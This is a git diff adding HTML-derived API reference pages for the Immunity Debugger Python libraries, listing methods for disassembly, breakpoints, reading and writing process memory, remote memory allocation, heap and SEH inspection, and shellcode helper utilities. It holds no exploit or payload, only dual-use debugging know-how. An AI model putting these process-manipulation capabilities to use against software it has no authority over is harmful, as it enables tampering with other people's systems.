+ nlines =1 ) source code
+
+ Determine size and analysis data
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmForwardTrace (self ,
+ address ,
+ nlines =1 ) source code
+
+ Trace integer registers
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmForwardFile (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disassembly, no symbols/registers
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmForwardCode (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disassembly, registers undefined
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmForwardRTrace (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disassemble with run-trace registers
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmBackward (self ,
+ address ,
+ nlines =1 ,
+ mode =5 ) source code
+
+ Disasm nlines backward from the given address
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmBackwardAddressOnly (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disasm nlines backward of given address
+
+ Parameters:
+
+ Addressnlines Returns: DWORD
+ Address of the Opcode
+
+
+
+
+
+
+
+ disasmBackwardSizeOnly (self ,
+ address ,
+ nlines =1 ) source code
+
+ Determine command size only
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmBackwardData (self ,
+ address ,
+ nlines =1 ) source code
+
+ Determine size and analysis data
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmBackwardTrace (self ,
+ address ,
+ nlines =1 ) source code
+
+ Trace integer registers
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmBackwardFile (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disassembly, no symbols/registers
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmBackwardCode (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disassembly, registers undefined
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmBackwardRTrace (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disassemble with run-trace registers
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ Get the internal decode information from an analysed module
+
+ Parameters:
+
+ Address Returns: Decode OBJECT
+ Decode Object containing the analized information
+
+
+
+
+
+
+
+ Go to next procedure
+
+ Returns: DWORD
+ Address of next procedure
+
+
+
+
+
+
+
+ Go to previous procedure
+
+ Returns: DWORD
+ Address of previous procedure
+
+
+
+
+
+
+
+ Get address's Opcode
+
+ Parameters:
+
+ Address Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ Assemble (self ,
+ code ,
+ address =0 ) source code
+
+ Assemble code.
+
+ Parameters:
+
+ code Returns: STRING
+ Opcodes of the assembled code
+
+
+
+
+
+
+
+ Decode given address
+
+ Returns: STRING
+ decoded value
+
+
+
+
+
+
+
+ undecorateName (self ,
+ decorated ) source code
+
+ Undecorate given name
+
+ Parameters:
+
+ decorated Returns: STRING
+ undecorated name
+
+
+
+
+
+
+
+ getTraceArgs (self ,
+ address ,
+ tracedarg ,
+ shownonusersupplied =False ) source code
+
+ Trace Parameters of a function, return only when is user-supplied
+
+ Parameters:
+
+ AddressTracedargShownonusersupplied Returns: TUPLES
+ Returns a tuple of (Push Opcode, TABLE of OPCODES setting the
+ PUSH)
+
+
+
+
+
+
+
+ getAllFunctions (self ,
+ address ) source code
+
+ Gets all function of given module's address
+
+ Returns: LIST
+ Function start address
+
+
+
+
+
+
+
+ Get the Function information
+
+ Parameters:
+
+ Address Returns: Function Object
+ Function Object containing information of the requested function
+
+
+
+
+
+
+
+ getFunctionBegin (self ,
+ address ) source code
+
+ Find start address of funcion
+
+ Returns: DWORD
+ Start Address
+
+
+
+
+
+
+
+ getFunctionEnd (self ,
+ function_address ) source code
+
+ Get all the possible ends of a Function
+
+ Parameters:
+
+ function_address Returns: LIST
+ List of Address of all the possible ret address
+
+
+
+
+
+
+
+ getAllBasicBlocks (self ,
+ address ) source code
+
+ Gets all basic blocks of given procedure (Deprecated, use
+ Function)
+
+ Returns: LIST
+ (start,end) addresses of basic blocks
+
+
+
+
+
+
+
+ Find data references to given address
+
+ Returns: LIST
+ Table with found references
+
+
+
+
+
+
+
+ Get X Reference from a given address
+
+ Parameters:
+
+ Address Returns: LIST
+ List of X reference from the given address
+
+
+
+
+
+
+
+ Get X Reference to a given address
+
+ Parameters:
+
+ Address Returns: LIST
+ List of X reference to the given address
+
+
+
+
+
+
+
+ Get intermodular calls
+
+ Parameters:
+
+ Address Returns: DICTIONARY
+ Dict of intermodular calls to the given address
+
+
+
+
+
+
+
+ Get CPU Context values.
+
+ Returns: DICTIONARY
+ x86 Registers
+
+
+
+
+
+
+
+ We have to do this to handle the Long integers, which XML-RPC cannot
+ do
+
+ Returns: DICTIONARY
+ x86 registers in string format (repr)
+
+
+
+
+
+
+
+ Set REG value
+
+ Parameters:
+
+ regvalevalue
+
+
+
+
+
+
+ Get the PEB information of the debugged process
+
+ Returns: PEB OBJECT
+ PEB
+
+
+
+
+
+
+
+ getHeap (self ,
+ addr ,
+ restore =False ) source code
+
+ Get Heap Information
+
+ Parameters:
+
+ addrrestore Returns: PHeap OBJECT
+ Heap
+
+
+
+
+
+
+
+ Get debugged name
+
+ Returns: STRING
+ Name of the Process been debugged
+
+
+
+
+
+
+
+ Get debugged pid
+
+ Returns: DWORD
+ Process ID
+
+
+
+
+
+
+
+ Is debugger running as admin?
+
+ Returns: INTEGER
+ 1 if running as admin
+
+
+
+
+
+
+
+ Get information displayed on Info Panel
+
+ Returns: TUPLE
+ Python Tuple with the 3 lines from InfoPanel
+
+
+
+
+
+
+
+ Get the current address been focus on the Disasm window
+
+ Returns: DWORD
+ Address
+
+
+
+
+
+
+
+ Get all loaded modules.
+
+ Returns: DICTIONARY
+ Dict of Modules
+
+
+
+
+
+
+
+ Get Module Information
+
+ Parameters:
+
+ name Returns: Module OBJECT
+ A Module object
+
+
+
+
+
+
+
+ getReferencedStrings (self ,
+ code_base ) source code
+
+ Get all referenced string from module
+
+ Parameters:
+
+ name Returns: LIST
+ A list of tuples with referenced strings (address, string,
+ comment)
+
+
+
+
+
+
+
+ List all active processes.
+
+ Returns: LIST
+ A list of tuples with process information (pid, name, path,
+ services, tcp list, udp list)
+
+
+
+
+
+
+
+ List all active processes.
+
+ Returns: LIST
+ A list of tuples with process information (pid, name, path,
+ services, tcp list, udp list)
+
+
+
+
+
+
+
+ Get the SEH chain.
+
+ Returns: LIST
+ A list of tuples with SEH information (seh, handler)
+
+
+
+
+
+
+
+ Get the current Event
+
+ Returns: Event Object
+ Event
+
+
+
+
+
+
+
+ Get a memory page.
+
+ Parameters:
+
+ addr Returns: Page OBJECT
+ Memory Page
+
+
+
+
+
+
+
+ getMemoryPagebyOwner (self ,
+ owner ) source code
+
+ Get the Memory Pages belonging to the given dll.
+
+ Parameters:
+
+ owner Returns: LIST
+ LIST of Memory Pages belonging to the given dll
+
+
+
+
+
+
+
+ getMemoryPagebyOwnerAddress (self ,
+ owner_addr ) source code
+
+ Get the Memory Pages belonging to the given dll by its base
+ address.
+
+ Parameters:
+
+ owner Returns: LIST
+ LIST of Memory Pages belonging to the given dll
+
+
+
+
+
+
+
+ getMemoryPagebyAddress (self ,
+ address ) source code
+
+ Get a memory page.
+
+ Parameters:
+
+ address Returns: Page OBJECT
+ Memory Page
+
+
+
+
+
+
+
+ Get All memory pages.
+
+ Returns: DICTIONARY
+ List of all memory pages
+
+
+
+
+
+
+
+ Query Memory Page
+
+ Parameters:
+
+ address Returns: Python List
+ List with memory page structure
+
+
+
+
+
+
+
+ Get all handles.
+
+ Returns: DICTIONARY
+ All the process handles
+
+
+
+
+
+
+
+ Get all threads.
+
+ Returns: LIST
+ All process threads
+
+
+
+
+
+
+
+ Get All Symbols.
+
+ Returns: DICTIONARY
+ All the symbols of the process
+
+
+
+
+
+
+
+ getAllSymbolsFromModule (self ,
+ address ) source code
+
+ Get Symbols from module.
+
+ Parameters:
+
+ Address Returns: DICTIONARY
+ All the symbols of the module
+
+
+
+
+
+
+
+ Get a Back Trace (Call stack).
+
+ Returns: LIST of Stack OBJECT
+ list of all the stack trace
+
+
+
+
+
+
+
+ Get the call tree of given address.
+
+ Returns: LIST of Call tuples
+ list of all the call tree ulong line; //
+ Line number in column ulong dummy; //
+ Must be 1 ulong type; // Type, set of
+ TY_xxx ulong entry; // Address of
+ function ulong from; // Address of
+ calling instruction ulong calls; //
+ Address of called subfunction
+
+
+
+
+
+
+
+ Find which module an address belongs to.
+
+ Parameters:
+
+ address Returns: LIST
+ Tuple of module information (name, base address)
+
+
+
+
+
+
+
+ Get a the process heaps
+
+ Returns: LIST of DWORD
+ List of Heap Address
+
+
+
+
+
+
+
+ getAddressOfExpression (self ,
+ expression ) source code
+
+ Get the address from an expression as ntdll.RtlAllocateHeap
+
+ Parameters:
+
+ expression Returns: DWORD
+ Address of the Expression
+
+
+
+
+
+
+
+ Get the address from an expression as ntdll.RtlAllocateHeap
+
+ Parameters:
+
+ expression Returns: DWORD
+ Address of the Expression
+
+
+
+
+
+
+
+ This function shows an Error dialog with a custom message.
+
+ Parameters:
+
+ msg
+
+
+
+
+
+
+ Opens text file in MDI windows. ( if no path is specified browsefile
+ dialog will pop up )
+
+
+
+
+
+
+
+
+ Sets the status bar message.
+
+ Parameters:
+
+ msg
+
+
+
+
+
+
+ logLines (self ,
+ data ,
+ address =0 ,
+ highlight =False ,
+ gray =False ,
+ focus =0 ) source code
+
+ Adds multiple lines of ASCII text to the log window.
+
+ Parameters:
+
+ msgaddresshighlightgray
+
+
+
+
+
+
+ Log (self ,
+ msg ,
+ address =0 ,
+ highlight =False ,
+ gray =False ,
+ focus =0 ) source code
+
+ Adds a single line of ASCII text to the log window.
+
+ Parameters:
+
+ msgaddresshighlightgray
+
+
+
+
+
+
+ log (self ,
+ msg ,
+ address =0 ,
+ highlight =False ,
+ gray =False ,
+ focus =0 ) source code
+
+ Adds a single line of ASCII text to the log window.
+
+ Parameters:
+
+ msgaddresshighlightgray
+
+
+
+
+
+
+ createWindow (self ,
+ title ,
+ col_titles ) source code
+
+ Creates a custom window.
+
+ Parameters:
+
+ titlecol_titles
+
+
+
+
+
+
+ createTable (self ,
+ title ,
+ col_titles ) source code
+
+ Creates a custom window.
+
+ Parameters:
+
+ titlecol_titles
+
+
+
+
+
+
+ Set focus on window.
+
+ Parameters:
+
+ handler
+
+
+
+
+
+
+ Does a window still exist?
+
+ Parameters:
+
+ handler Returns:
+ INT : 1 Exists, 0 Doesnt exist
+
+
+
+
+
+
+
+ setStatusBarandLog (self ,
+ addr ,
+ msg ) source code
+
+ Sets and logs a status bar message.
+
+ Parameters:
+
+ addrmsg
+
+
+
+
+
+
+ Flashes a message at status bar.
+
+ Parameters:
+
+ msg
+
+
+
+
+
+
+ setProgressBar (self ,
+ message ,
+ promille =100 ) source code
+
+ Displays a progress bar which can contain formatted text and a
+ progress percentage. If the formatted text contains a dollar sign ('$')
+ it will be replaced by the current progress percentage.
+
+ Parameters:
+
+ msgpromille
+
+
+
+
+
+
+ getComment (self ,
+ address ,
+ type =253 ) source code
+
+ Get the comment of the opcode line.
+
+ Parameters:
+
+ address Returns: STRING
+ Requested comment
+
+
+
+
+
+
+
+ setComment (self ,
+ address ,
+ comment ) source code
+
+ Set a comment.
+
+ Parameters:
+
+ addresscomment
+
+
+
+
+
+
+ setLabel (self ,
+ address ,
+ label ) source code
+
+ Set a label.
+
+ Parameters:
+
+ addresslabeladresss
+
+
+
+
+
+
+ findDependecies (self ,
+ lookfor ) source code
+
+ Find exported function on the loaded dlls.
+
+ Parameters:
+
+ lookfor Returns: DICTIONARY
+ Dictionary
+
+
+
+
+
+
+
+ Check if debugger is running under a vmware machine
+
+ Returns: DWORD
+ 1 if vmware machine exists
+
+
+
+
+
+
+
+ ManualBreakpoint (self ,
+ address ,
+ key ,
+ shiftkey ,
+ font ) source code
+
+ Set a Manual Breakpoint.
+
+ Parameters:
+
+ addresskeyshiftkeyfont
+
+
+
+
+
+
+ setUnconditionalBreakpoint (self ,
+ address ,
+ font ='fixed' source code
+
+ Set an Unconditional Breakpoint.
+
+ Parameters:
+
+ addressfont
+
+
+
+
+
+
+ setConditionalBreakpoint (self ,
+ address ,
+ font ='fixed' source code
+
+ Set a Conditional Breakpoint.
+
+ Parameters:
+
+ addressfont
+
+
+
+
+
+
+ setLoggingBreakpoint (self ,
+ address ) source code
+
+ Set a Logging Breakpoint. (This breakpoint will not puase the
+ execution, it will just act as a Watch point"
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ Set a watching Breakpoint.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ setTemporaryBreakpoint (self ,
+ address ,
+ continue_execution =False ,
+ stoptrace =False ) source code
+
+ Set a Temporary Breakpoint.
+
+ Parameters:
+
+ addresscontinue_executionstoptrace
+
+
+
+
+
+
+ Set a Breakpoint.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ setBreakpointOnName (self ,
+ name ) source code
+
+ Set a Breakpoint.
+
+ Parameters:
+
+ Name Returns: DWORD
+ Address of name
+
+
+
+
+
+
+
+ disableBreakpoint (self ,
+ address ) source code
+
+ Disable Breakpoint.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ deleteBreakpoint (self ,
+ address ,
+ address2 =0 ) source code
+
+ Delete Breakpoint.
+
+ Parameters:
+
+ addressAddressaddress2
+
+
+
+
+
+
+ getBreakpointType (self ,
+ address ) source code
+
+ Get the Breakpoint type.
+
+ Parameters:
+
+ address Returns: STRING
+ Breakpoint type
+
+
+
+
+
+
+
+ setMemBreakpoint (self ,
+ addr ,
+ type ,
+ size =4 ) source code
+
+ Modifies or removes a memory breakpoint.
+
+ Parameters:
+
+ addresstypesize
+
+
+
+
+
+
+ writeLong (self ,
+ address ,
+ dword ) source code
+
+ Write long to memory address.
+
+ Parameters:
+
+ addressdword
+
+
+
+
+
+
+ writeMemory (self ,
+ address ,
+ buf ) source code
+
+ Write buffer to memory address.
+
+ Parameters:
+
+ addressbuf
+
+
+
+
+
+
+ readMemory (self ,
+ address ,
+ size ) source code
+
+ Read block of memory.
+
+ Parameters:
+
+ addresssize Returns: BUFFER
+ Process memory
+
+
+
+
+
+
+
+ Read a Long from the debugged process
+
+ Parameters:
+
+ address Returns: DWORD
+ Long
+
+
+
+
+
+
+
+ Read a string from the remote process
+
+ Parameters:
+
+ address Returns: String
+ String
+
+
+
+
+
+
+
+ Read a unicode string from the remote process
+
+ Parameters:
+
+ address Returns: Unicode String
+ Unicode String
+
+
+
+
+
+
+
+ readUntil (self ,
+ address ,
+ ending ) source code
+
+ Read string until ending starting at given address
+
+ Parameters:
+
+ Address
+
+
+
+
+
+
+ Read a short integer from the remote process
+
+ Parameters:
+
+ address Returns: Short Integer
+ Short
+
+
+
+
+
+
+
+ searchShort (self ,
+ short ,
+ flag =None ) source code
+
+ Search a short integer on the remote process memory
+
+ Parameters:
+
+ shortflag Returns: List
+ List of address of the short integer founded
+
+
+
+
+
+
+
+ searchLong (self ,
+ long ,
+ flag =None ) source code
+
+ Search a short integer on the remote process memory
+
+ Parameters:
+
+ longflag Returns: List
+ List of address of the integer founded
+
+
+
+
+
+
+
+ Search string in executable memory.
+
+ Parameters:
+
+ buf Returns:
+ A list of address where the string was found on memory
+
+
+
+
+
+
+
+ Search string in writable memory.
+
+ Parameters:
+
+ buf Returns:
+ A list of address where the string was found on memory
+
+
+
+
+
+
+
+ Search string in readable memory.
+
+ Parameters:
+
+ buf Returns:
+ A list of address where the string was found on memory
+
+
+
+
+
+
+
+ Search (self ,
+ buf ,
+ flag =None ) source code
+
+ Search string in memory.
+
+ Parameters:
+
+ bufflag Returns:
+ A list of address where the string was found on memory
+
+
+
+
+
+
+
+ Search for a sequence of commands in all executable modules
+ loaded.
+
+ Parameters:
+
+ cmd Returns: List
+ List of address of the command found
+ NOTE: Since ImmunityDebugger 1.2 , the returning tuple[1]
+ value is deprecated, if you need the opcode string of the
+ resulted address, you'll have to do a
+ immlib.Disasm(tuple[0]).
+
+
+
+
+
+
+
+ searchCommandsOnModule (self ,
+ address ,
+ cmd ) source code
+
+ Search for a sequence of commands in given executable module.
+
+ Parameters:
+
+ cmd Returns: List
+ List of address of the command found
+ NOTE: Since ImmunityDebugger 1.2 , the returning tuple[1]
+ value is deprecated, if you need the opcode string of the
+ resulted address, you'll have to do a
+ immlib.Disasm(tuple[0]).
+
+
+
+
+
+
+
+ Run Process untill address.
+
+ Parameters:
+
+
+
+
+
+
+
+ Step-Over Process untill address.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ Step-in Process untill address.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ ignoreSingleStep (self ,
+ flag ='CONTINUE' source code
+
+ Ignore Single Step events
+
+ Parameters:
+
+
+
+
+
+
+
+ openProcess (self ,
+ path ,
+ mode =0 ) source code
+
+ Open process for debugging
+
+ Parameters:
+
+ pathmode
+
+
+
+
+
+
+ restartProcess (self ,
+ mode =-1 ) source code
+
+ Restart debuggee
+
+ Parameters:
+
+ mode
+
+
+
+
+
+
+ Attach to an active process
+
+ Parameters:
+
+ pid
+
+
+
+
+
+
+ Set/Unset silent debugging flag
+
+ Parameters:
+
+ silent
+
+
+
+
+
+
+ addHeader (self ,
+ address ,
+ header ,
+ color ='Black' source code
+
+ Add a header to given row.
+
+ Parameters:
+
+ addressheadercolor
+
+
+
+
+
+
+ Removes header from row.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ Removes header from row.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ Get Header from row.
+
+ Parameters:
+
+ address
+
+
+
+
+
+
+ addLine (self ,
+ address ,
+ header ,
+ color ='Black' source code
+
+ Add a line to cpu window.
+
+ Parameters:
+
+ addressheadercolor
+
+
+
+
+
+
+ GoTo the Disassembler Window.
+
+ Parameters:
+
+ addr
+
+
+
+
+
+
+ GoTo Dump Window.
+
+ Parameters:
+
+ addr
+
+
+
+
+
+
+ GoTo the Stack Window.
+
+ Parameters:
+
+ addr
+
+
+
+
+
+
+ Creates Dialog with an Inputbox.
+
+ Parameters:
+
+ title Returns:
+ String from the inputbox
+
+
+
+
+
+
+
+ comboBox (self ,
+ title ,
+ combolist ) source code
+
+ Creates Dialog with a Combobox.
+
+ Parameters:
+
+ titlecombolist Returns:
+ Selected item
+
+
+
+
+
+
+
+ Get the status of the debugged process.
+
+ Returns:
+ Status of the debugged process
+
+
+
+
+
+
+
+ Is the debugged process stopped?
+
+ Returns: BOOL
+ Boolean (True/False)
+
+
+
+
+
+
+
+ Is the debugged process in an event state?
+
+ Returns: BOOL
+ Boolean (True/False)
+
+
+
+
+
+
+
+ Is the debugged process running?
+
+ Returns: BOOL
+ Boolean (True/False)
+
+
+
+
+
+
+
+ Is the debugged process finished?
+
+ Returns: BOOL
+ Boolean (True/False)
+
+
+
+
+
+
+
+ Is the debugged process closed?
+
+ Returns: BOOL
+ Boolean (True/False)
+
+
+
+
+
+
+
+ List of active hooks
+
+ Returns: LIST
+ List of active hooks
+
+
+
+
+
+
+
+ rVirtualAlloc (self ,
+ lpAddress ,
+ dwSize ,
+ flAllocationType ,
+ flProtect ) source code
+
+ Virtual Allocation on the Debugged Process
+
+ Parameters:
+
+ lpAddressdwSizeflAllocationTypeflProtect Returns: DWORD
+ Address of the memory allocated
+
+
+
+
+
+
+
+ rVirtualFree (self ,
+ lpAddress ,
+ dwSize =0 ,
+ dwFreeType =32768 ) source code
+
+ Virtual Free of memory on the Debugged Process
+
+ Parameters:
+
+ sizedwFreeType Returns: DWORD
+ On Successful, returns a non zero value
+
+
+
+
+
+
+
+ remoteVirtualAlloc (self ,
+ size =65536 ,
+ interactive =True ) source code
+
+ Virtual Allocation on the Debugged Process
+
+ Parameters:
+
+ size Returns: DWORD
+ Address of the memory allocated
+
+
+
+
+
+
+
+ Get OS information
+
+ Returns: TUPLE
+ List with ( system, release, version)
+
+
+
+
+
+
+
+ Return current debuggee thread id
+
+ Returns:
+ Thread ID
+
+
+
+
+
+
+
+ searchFunctionByName (self ,
+ name ,
+ heuristic =90 ,
+ module =None ,
+ version =None ,
+ data ='' source code
+
+ Look up into our dictionaries to find a function match.
+
+ Parameters:
+
+ namemoduleversionheuristicdata Returns: DWORD|None
+ the address of the function or None if we can't find it
+
+
+
+
+
+
+
+ searchFunctionByHeuristic (self ,
+ csvline ,
+ heuristic =90 ,
+ module =None ,
+ data ='' source code
+
+ Search memory to find a function that fullfit the options.
+
+ Parameters:
+
+ csvlineheuristicmoduledata Returns: DWORD|None
+ the address of the function or None if we can't find it
+
+
+
+
+
+
+
+ resolvFunctionByAddress (self ,
+ address ,
+ heuristic =90 ,
+ data ='' source code
+
+ Look up into our dictionaries to find a function match.
+
+ Parameters:
+
+ addressheuristicdata Returns: STRING
+ a STRING with the function's real name or the given address if
+ there's no match
+
+
+
+
+
+
+
+ makeFunctionHashHeuristic (self ,
+ address ,
+ compressed =False ,
+ followCalls =True ,
+ data ='' source code
+
+
+
+ Parameters:
+
+ addresscompressedfollowCallsdata Returns: LIST
+ the first element is described below and the second is the result
+ of this same function but over the first call of a single basic
+ block function (if applies), each element is like this: a base64
+ representation of the compressed version of each bb hash: [4
+ bytes BB(i) start][4 bytes BB(i) 1st edge][4 bytes BB(i) 2nd
+ edge] 0 <= i < BB count or the same but like a LIST with
+ raw data.
+
+
+
+
+
+
+
+ makeFunctionHashExact (self ,
+ address ,
+ data ='' source code
+
+ Return a SHA-1 hash of the function, taking the raw bytes as data.
+
+ Parameters:
+
+ addressdata Returns: STRING
+ SHA-1 hash of the function
+
+
+
+
+
+
+
+ makeFunctionHash (self ,
+ address ,
+ compressed =False ,
+ data ='' source code
+
+ Return a list with the best BB to use for a search and the heuristic
+ hash of the function. This two components are the function hash.
+
+ Parameters:
+
+ addresscompresseddata Returns: LIST
+ 1st element is the generalized instructions to use with
+ searchCommand 2nd element is the heuristic function hash
+ (makeFunctionHashHeuristic) 3rd element is an exact hash of the
+ function (makeFunctionHashExact)
+
+
+
+
+
+
+
+
+
+This function finds Natural Loops inside a function.
+
+Each loop item has the following structure:
+ [ start, end, nodes ]
+ start: address of node receiving the back edge.
+ end: address of node which has the back edge.
+ node: list of node's addresses involved in this loop.
+
+@type address: DWORD
+@param address: function start address
+
+@rtype: LIST
+@return: A list of loops
+
+
+
+
+
+
+
+
+
+
+ sleep_till_stopped (self ,
+ timeout ) source code
+
+ timeout is in seconds. this function will sleep 1 second at a time
+ until timeout is reached or the debugger has stopped (probably due to AV)
+ returns True if we were stopped before timeout happened
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immlib.DictTypes-class.html b/1.73/Documentation/Ref/Libs.immlib.DictTypes-class.html
new file mode 100755
index 0000000..e925e9c
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immlib.DictTypes-class.html
@@ -0,0 +1,284 @@
+
+
+
+
+ Libs.immlib.DictTypes
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immlib ::
+ Class DictTypes
+
+
+
+
+
+
+
+
+Class DictTypes source code
+
+ UserDict.UserDict --+
+ |
+UserDict.IterableUserDict --+
+ |
+ DictTypes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Inherited from UserDict.UserDict :
+ __cmp__,
+ __contains__,
+ __delitem__,
+ __getitem__,
+ __len__,
+ __repr__,
+ __setitem__,
+ clear,
+ copy,
+ get,
+ has_key,
+ items,
+ iteritems,
+ iterkeys,
+ itervalues,
+ keys,
+ pop,
+ popitem,
+ setdefault,
+ update,
+ values
+
+
+
+
+
+
+
+
+
+ Inherited from UserDict.UserDict :
+ fromkeys
+
+
+
+
+
+
+
+
+
+
+
+
+ Overrides:
+ UserDict.UserDict.__init__
+
+
+
+
+
+
+
+
+
+
+ Overrides:
+ UserDict.IterableUserDict.__iter__
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immutils-module.html b/1.73/Documentation/Ref/Libs.immutils-module.html
new file mode 100755
index 0000000..ea45f27
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immutils-module.html
@@ -0,0 +1,1726 @@
+
+
+
+
+ Libs.immutils
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immutils
+
+
+
+
+
+
+
+
+Module immutils source code
+(c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+ MOSDEF utils for non-CANVAS users
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ warnings_safely_ignore (*args ,
+ **kargs )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ warning_restore (*args ,
+ **kargs )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ deprecate (*args ,
+ **kargs )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ hasbadchar (word ,
+ badchars )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ check_bits_consistancy (bits )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ check_string_len (s ,
+ l ,
+ assertmsg =''
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ int2list_bits (bits ,
+ i ,
+ swap =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ int2list32 (int32 ,
+ swap =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ int2str_bits (bits ,
+ i ,
+ swap =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ str2int_bits_swapped (bits ,
+ s )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ str2bigendian (astring )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ shellcode_dump (sc ,
+ align =0 ,
+ alignpad =' 'alignmax =16 ,
+ mode =None )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ dummywrite (fd ,
+ data )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ binary_string_bits (bits ,
+ i )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ dInt (sint )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ binary_from_string (astr ,
+ bits =None )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ prettyhexprint (s ,
+ length =8 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ bits (myint ,
+ maxbits =32 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ IsInt (str )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
